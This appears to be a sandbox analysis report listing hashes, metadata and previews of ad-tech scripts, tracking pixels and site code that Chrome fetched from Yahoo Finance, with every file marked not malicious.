                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?p=137711&s=137812&predirect=https%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D58%263pid%3D&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://www.yahoo.com/px.gif?ch=1&rn=6.422501612766903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65509)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):940793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.353000247859796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:RPn9O8VI15IVkDc1qME1w7riubkaYcNWV/dWnFOqvIplzohhcgZS9jhyz9yeL0Zq:pn9dVI15IVkDc1qME1w7riubkaYcNWVw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:23703603A780B95BCB99F247A3D1D835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6C4E409B96C4298C7AB5BAD0C0CC1660E48CC2BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:90AA5A867A4608CD7A914C28CF8BFA96E9A7DF96EEB1BFA7BDE1F057B57B61AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D2EC1A07961C995925B89FC8E97CA0FB5E412E03B9060064F0B90256B59E1C4A4ED331CA45A8C718BEEB781B46C92C76789B3B250E10439A8E4A6B8505CE020F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/libtrc/impl.20241006-3-RELEASE.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! 20241006-3-RELEASE */..!function(e){e.TRC=e.TRC||{},e.TRC.sharedObjects=e.TRC.sharedObjects||{},e.TRC.sharedObjects.loadedScripts=e.TRC.sharedObjects.loadedScripts||{},e.TRC.sharedObjects.loadedPixels=e.TRC.sharedObjects.loadedPixels||{}}(window),function(){var win,doc;((e,t,r)=>{const i="trc_modal_hidden",o="trc_modal_mask",n="trc_modal_dialog",a="trc_close_modal",s=t.createElement("div"),l=t.createElement("div");let c,d="";function p(){u(l,i),u(s,i),r.dom.off(t,"keyup",m),r.dom.off(t,"click",g),r.dom.off(t.getElementById(a),"click",g),r.dom.off(e,"message",b)}function h(){u(l,o),u(l,i),u(s,n),u(s,i),w.appendChild(l),w.appendChild(s),t.body.appendChild(R),y(d),c=!0}const u=function(e,t){if(e.classList)return e.classList.add(t);r.dom.removeClass(e,t),e.className+=` ${t}`},m=e=>{const t=e.which||e.keyCode;27===t&&p()},g=e=>{const t=e.target||e.srcElement;t!==l&&t.id!==a||(r.dom.stopEvent(e),p())},b=e=>{/http(s)?:\/\/www\.taboola\.com/.test(e.origin)&&e.data&&1025==+e.data&&p()},f=fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsuTamyCRbeGio70B-3b3oOyg1JFbkcOvx_wZ6MfxMAAsyPFaywp53Hnvxslp-bdEI_CiOvvtOA-iXLrFQEgrypBddO9vJW47Fhr2BcZgVPM1I-UCv1aIYb3pTueROH_EL7DrPOY3-Z1F5ionYdFUqxgpru-M6-83a7TixuBsHTjyacGl7gl5xGBlHa4mbPZ37LOnA&sig=Cg0ArKJSzGHf6VnX-uctEAE&id=lidar2&mcvt=1036&p=24,276,114,1004&tm=12446.799999999988&tu=11410.799999999988&mtos=1036,1036,1036,1036,1036&tos=1036,0,0,0,0&v=20241007&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=19&adk=4039402601&rs=4&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=v&co=2434774600&rst=1728414945039&rpt=12937&isd=0&lsd=0&met=ce&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537072966&val=B10818355A1E4AEF9DACBED2B931E80E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (376)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.432023892876851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:8mBRHNr5YhkHKJ78O3O+VkCyoINr50d3UKNr5+fDzYRNr54wd4v3DKzdNr5z:pBTSkHKSnvTcs8GwIKZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BE34809FEDDB399844A6466C86F3083E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FFE94A71D5FE53D94C52AC57203F89CDBE144E7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4160F561B2DAACF94409249E52A369043BC23DA4BA04228B55C097C211B2EEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AFE492C0D2564BE2439D6DD9CC3B03BC4319FED26924EBBFE059BC5468BE03C5D0D02A3AD96DD57A833433252BEFCC391640765E2BBCDEAC6CBEC5AAED5D4B47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/pbcas?us_privacy=1YNN&gdpr=0&gdpr_consent=&type=iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<body>.<img src="https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_cm&pn_id=c" style="display: none;" border="0" height="1" width="1">.<img src="https://image8.pubmatic.com/AdServer/ImgSync?p=160648&gdpr=&gdpr_consent=&pu=https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT" style="display: none;" border="0" height="1" width="1">.<img src="https://bh.contextweb.com/bh/rtset?pid=561118&ev=1&rurl=https%3a%2f%2fads.yieldmo.com/v000/sync?userid=%%VGUID%%&pn_id=pp&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&us_privacy=" style="display: none;" border="0" height="1" width="1">.<img src="https://match.adsrvr.org/track/cmf/generic?ttd_pid=yieldmo&ttd_tpi=1&ttd_puid=VemaRRRssVROifkNwh53" style="display: none;" border="0" height="1" width="1">.<img src="https://dis.criteo.com/dis/usersync.aspx?r=55&p=104&cp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1068), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.475253720948438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:2jExGhJpuadP1GYcT1nGnG2Q1QX0q/Fyx3yVAuNLjNY:2jExazt+ThGnP8Qkuyx3+3NLW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:738DF214A6B6E94BC006A62AF255B3FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D0562466B9684DAA4D27007405D395BDF9C8B02A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E7E929067DC0FDDA4EB35AE3D865A309D215E7CB55052E7E1DB7CB02E69A1DE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F623B589F3B5DD6C9FADCBEBCA9B19FD17C4191C972584E6FBF3A683E28F668A256BD9C63C6BB5FE4049747C8A6F9396CD6282B59E08D0FF023E6F64DAD3814F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tps.doubleverify.com/visit.js?gdpr=&gdpr_consent=&flvr=1&ttmms=56&ttfrms=88&brid=3&brver=117.0.0.0&bridua=3&bds=1&tstype=128&eparams=DC4FC%3Dl9EEADTbpTauTau7%3A%3F2%3F46%5DJ29%40%40%5D4%40%3ETau%3E2C%3C6EDTau4CJAE%40Tau2%3D%3DTauU2%3F4r92%3A%3Fl9EEADTbpTauTau7%3A%3F2%3F46%5DJ29%40%40%5D4%40%3ETar9EEADTbpTauTauh36f26cgaab46_dd_6hhf2h%60%60hb%60a4c4%5DD2767C2%3E6%5D8%40%408%3D6DJ%3F5%3A42E%3A%40%3F%5D4%40%3E&srcurlD=0&aUrlD=0&ssl=https:&dfs=4412&ddur=1770&uid=1728414886860448&jsCallback=dvCallback_1728414886860362&dvtagver=6.1.src&navUa=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&htmlmsging=1&chro=1&hist=1&winh=90&winw=728&wouh=984&wouw=1280&scah=984&scaw=1280&jsver=6793&tgjsver=6793&lvvn=28&m1=96&refD=1&referrer=https%3A%2F%2F9be7ae48223ce0550e997a9119312c4c.safeframe.googlesyndication.com%2Fsafeframe%2F1-0-40%2Fhtml%2Fcontainer.html&fcifrms=25&brh=1&dvp_epl=276&noc=4&nav_pltfrm=Win32&ctx=20006197&cmp=31049690&sid=5071708&plc=382132454&crt=192766442&adsrv=1&advid=3876774&unit=728x90&turl=https://finance.yahoo.com/markets/crypto/all/&c1=1982032&bsimpid=e9c7fc32685d4ea3a7784e7b5a0d4ad8&prr=1&errorURL=https://tps.doubleverify.com/visit.jpg&ppid=103&auevent=ABAjH0jBI5NoWyFvIXMOtDRNBpU0&aucmp=20678044986&aucrtv=536029563&auorder=1014837928&ausite=6613965583&auxch=1&pltfrm=1&aufilter1=1982032&autt=1&mib=0&mon=1&blk=1&dvp_cawf=crtwrp&cm360cw=1&dvp_rcp=2&dvp_seem=2&dvp_tuk=1&dvp_sukv=92144122.05984606&ee_dp_sukv=92144122.05984606&dvp_tukv=106748920.65443093&ee_dp_tukv=106748920.65443093&dvp_tuid=1387220881378&jurtd=1960696690
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:try{var dv_win = window._dv_win || window.parent._dv_win; dv_win['dvCallback_1728414886860362']($dv,window,'1aa7021e668545b1a2ca5957a51c3abc','tpsc-ew1.doubleverify.com',{"ce":{"ddt":1,"dt":1}});}catch(e){try{var image=window.document.createElement('img');image.src=('https://tps.doubleverify.com/visit.jpg'||(window.location.protocol+'//tps30.doubleverify.com/visit.jpg'))+'?ctx=818052&cmp=1619415&dvtagver=6.1.src&dvp_cbError='+encodeURIComponent(e.message)}catch(e){}}var dvObj=$dv;var impId='1aa7021e668545b1a2ca5957a51c3abc';var dup='';dvObj.pubSub.subscribe('ImpressionServed',impId,'ResearchIPv6FromAkamai',function(){ var tagObj = dvObj.tags[impId]; var serverName = tagObj['ServerPublicDns'].substr(0, tagObj['ServerPublicDns'].indexOf('.')); var tpsServerUrl = 'https://cdn.doubleverify.com/redirect/?host=' + serverName + '&param=akipv6&impid=' + impId + '&dup=' + dup + '&eoid=1000'; dvObj.domUtilities.addImage(tpsServerUrl, null, true);});try{$dv.pubSub.publish('ImpressionServe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2363
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.404726875592417
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:giDtvCPygcjWehmA+23vWZZFI0jmdgqc5Qp5T+/T2e94vZH8J92sTL6:gih6xaFX+4+ZFIYyHQ2Q920L6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5FCA1512591F2584BEC8F9F6122649D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9306A839CDE38B33990D72B16F340D0D38ABAB4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:419EB504B4499F4D0721CAB01AF7F47425169B1AB030DC664E795B5EC44518D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A44B1F3C5A021E531E549A7A6271007F818F528931E137D80F7578ABCE0C159FF012D3F49A390E77F4D482129A153FBE40DEE25A4BE4F5131F9D5C224BF27662
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Header.Db1Xn_Q6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as R,e as w,d as S,f as _,i as f,q as F,k as v,o as k,D as q,I as B,n as Y}from"./scheduler.Dr9AAxFe.js";import{S as A,i as I,c as T,b as x,m as D,t as E,a as H,d as P}from"./index.DCSmZEjO.js";import{n as L,r as M,g as p,C as V}from"./commonUtil.CI22_Irn.js";import{R as G}from"./RMP.DAY9oSd8.js";import{g}from"./43.CtYdpA_T.js";function Q(c){let e;return{c(){e=w("div"),this.h()},l(t){e=S(t,"DIV",{class:!0}),_(e).forEach(f),this.h()},h(){F(e,"class","placeholder yf-6nfr06")},m(t,r){v(t,e,r)},p:Y,d(t){t&&f(e)}}}function U(c){let e,t,r;return t=new G({props:{key:"tdv2-wafer-header.HeaderYBar",data:c[1],$$slots:{default:[Q]},$$scope:{ctx:c}}}),{c(){e=w("div"),T(t.$$.fragment),this.h()},l(n){e=S(n,"DIV",{class:!0});var a=_(e);x(t.$$.fragment,a),a.forEach(f),this.h()},h(){F(e,"class","ybar-sticky")},m(n,a){v(n,e,a),D(t,e,null),r=!0},p(n,[a]){const d={};a&2048&&(d.$$scope={dirty:a,ctx:n}),t.$set(d)},i(n){r||(E(t.$$.fragment,n),r=!0)},o(n){H(t.$$.fragment,n),r=!1},d(n){n&&f(e),P(t)}}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2238
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.20822051335051
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:susqeZyNQIfmwJ0osmoRvA+SNOFjTLpUdq9nQbAz6jB5UekYpXLimkBbKsVEtotx:survfwvpRUdq9nQjkYAJbK9tmq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3A07174943F82046370997254100D870
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ECB1E2E89AF0EC6F45F875C22DF0FBD45821BA80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6F7EE2CADAE2E121342A8C4245141175BFE887776206DEB17149D46CF3AA827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0A589E20251F62F02C4B96B916FBD9359677A26379D46EEEF4E455464643DE0C9AEEF921AD563D970E7436805DD18AE974DE6942DFDF0C65089512D8A3B2FD35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:...... ..............(... ...@.................................`...a...a...b...c...d...e...f...g...h...i...j...k...l...p...r.. s..$v..)y..+z...|..0}..6...9...;...A...K...L...P...R...T...X...Y...\...k...l...o...p...x...y...~.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.256306466575051
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:IU7waifM+pFAk5waifMKY:NwpM+nB5wpMKY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:631538D4008D6F842DEA6C1086EF1735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BF7FB2B016029213CCDD07022389F9378D964078
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E533CDA6C462E7A158E2E2F371649BA7A970140BCF957976DD72C1CA73FB0D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CE48F607DF4FED664015B63A5A6D674AF0D9B26C022B6A0B421C02A576E13AA9E050B0D31466CD6859FFA09E137CF9CC34BE0FC7C28898B807DF1F2C5F56A9E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pa.ybp.yahoo.com/.well-known/interest-group/permissions/?origin=https%3A%2F%2Fgps-aa.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "joinAdInterestGroup": true,. "leaveAdInterestGroup": true.}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8512)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.352754076538434
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:+Vk4YMoWbld4UAfsC5JHN9/kdypdTLrmiUcfV:+VkaoWj4PfsCDHfsdGvm3S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3B3884BFE7601CF35CB4E4E2C62E2606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8EE73D1B1B2868EC5F5E929F113C29A95AAB029C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4575016E6B39FF54B6BBF3DB6E5D16BEDDBC5A399EECBA69B0171F32D869172F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:96956CE5BBFB322DE1715C16C0F68EC0177D094267C23F6451B248368C5A68CA5C8F050EA64EED145CC456C947F17E7E325BE5AA8331151469C7A99A3525B9C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadPortfolios.CToUELqx.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{aa as A,ab as nt,e as R,j as G,ac as rt,ad as at,d as j,k as z,J as ot,ae as it,r as st,a1 as lt,af as ut,ag as K,ah as ft,a2 as ct,ai as ht}from"./commonUtil.CI22_Irn.js";import{l as F,f as $}from"./logUtil.hOue7iAU.js";import{l as Z}from"./loadQuote.D9BAmXuK.js";var dt=200,Q="__lodash_hash_undefined__",pt=1/0,_t="[object Function]",gt="[object GeneratorFunction]",mt=/[\\^$.*+?()[\]{}|]/g,yt=/^\[object .+?Constructor\]$/,bt=typeof A=="object"&&A&&A.Object===Object&&A,wt=typeof self=="object"&&self&&self.Object===Object&&self,U=bt||wt||Function("return this")();function vt(t,e){var n=t?t.length:0;return!!n&&St(t,e,0)>-1}function It(t,e,n,r){for(var i=t.length,a=n+-1;++a<i;)if(e(t[a],a,t))return a;return-1}function St(t,e,n){if(e!==e)return It(t,Ct,n);for(var r=n-1,i=t.length;++r<i;)if(t[r]===e)return r;return-1}function Ct(t){return t!==t}function Lt(t,e){return t.has(e)}function Pt(t,e){return t==null?void 0:t[e]}function Ot(t){var e=!1;if(t!=null&&typeof t.toString!="function"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
